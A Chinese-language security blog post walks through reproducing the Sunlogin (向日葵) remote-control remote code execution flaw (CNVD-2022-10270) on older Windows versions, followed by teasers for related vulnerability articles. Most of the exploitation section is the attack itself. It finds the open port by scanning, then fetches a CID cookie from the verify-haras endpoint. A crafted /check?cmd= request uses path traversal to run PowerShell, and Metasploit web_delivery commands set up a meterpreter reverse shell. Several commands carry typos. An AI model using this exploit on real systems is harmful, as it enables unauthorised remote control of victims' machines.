14 向日葵远程RCE漏洞

简介: 向日葵是一款远控软件

漏洞发现

向日葵远控使用时会默认打开一个多个端口供服务使用 但是开启的端口不固定,所以需要通过扫描探测 影响范围版本在11.0.33以下版本存在 向日葵个人版 for Windows<=11.0.0.33 向日葵简约版<=V1.0.1.43315(2021.12)

漏洞复现

端口扫描

nmap

Railgun

image.png

得到端口之后一个一个访问

出现以上界面,说明存在了向日葵远程rce漏洞

漏洞利用

命令执行

获取verify_string值 需要verify_string的值象作为CID进行传输认证 访问接口/cgi-bin/rpc?action=verify-haras 获取cookie 52cCBrRfK7tKFiNjOvSmoapmykt3Clg2

image.png

将获取到cookie的值复制下来

打开burp

把verify_string的值添加进cookie中 访问/check接口添加cmd参数进行执行命令 使用burp进行修改数据包的内容

添加修改数据包

GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/power shel1. exe%20whoani

Cookie:CID=.......

image.png

image.png

msf向日葵利用

msfconsole
search multi/script/web_delivery
use multi/script/web_delivery
show options
show targets
set targets 2
set payload windows/X64/meterpreter/reserve_tcp
set lhost .......
set lp
exploitort
复制粘贴修改

image.png

相关文章
|
安全 网络安全 Windows
向日葵RCE复现 | CNVD-2022-10270 CNVD-2022-03672
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。 于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
458 0
向日葵RCE复现 | CNVD-2022-10270 CNVD-2022-03672
|
安全 网络安全 Windows
向日葵RCE(CNVD-2022-10270)
向日葵RCE(CNVD-2022-10270)
213 0
|
XML Web App开发 安全
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
DVR登录绕过漏洞&&phpstudy后门rce
|
SQL 安全 关系型数据库
ecshop 全系列版本通杀漏洞 远程代码执行sql注入漏洞
ecshop漏洞于2018年9月12日被某安全组织披露爆出,该漏洞受影响范围较广,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影响,主要漏洞是利用远程代码执行sql注入语句漏洞,导致可以插入sql查询代码以及写入代码到网站服务器里,严重的可以直接获取服务器的管理员权限,甚至有些网站使用的是虚拟主机,可以直接获取网站ftp的权限,该漏洞POC已公开,使用简单,目前很多商城网站都被攻击,危害较大,针对于此我们SINE安全对该ECSHOP漏洞的详情以及如何修复网站的漏洞,及如何部署网站安全等方面进行详细的解读。
535 0
ecshop 全系列版本通杀漏洞 远程代码执行sql注入漏洞
|
安全 Windows
【漏洞公告】高危:Windows系统 SMB/RDP远程命令执行漏洞
2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确保您在阿里云上的业务安全,请您关注,具体漏洞详情如下: 漏洞编号: 暂无 漏洞名称: Windows系统多个SMB\RDP远程命令执行漏洞官方评级: 高危 漏洞描述: 国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,可以利用SMB、RDP服务成功入侵服务器。
1602 0
|
安全 网络安全
关于OpenSSH远程代码执行漏洞的通报
本文讲的是关于OpenSSH远程代码执行漏洞的通报,近日,互联网上披露了有关“OpenSSH远程代码执行漏洞(CNNVD-201612-616)”的相关情况,引发安全研究人员高度关注。
2060 0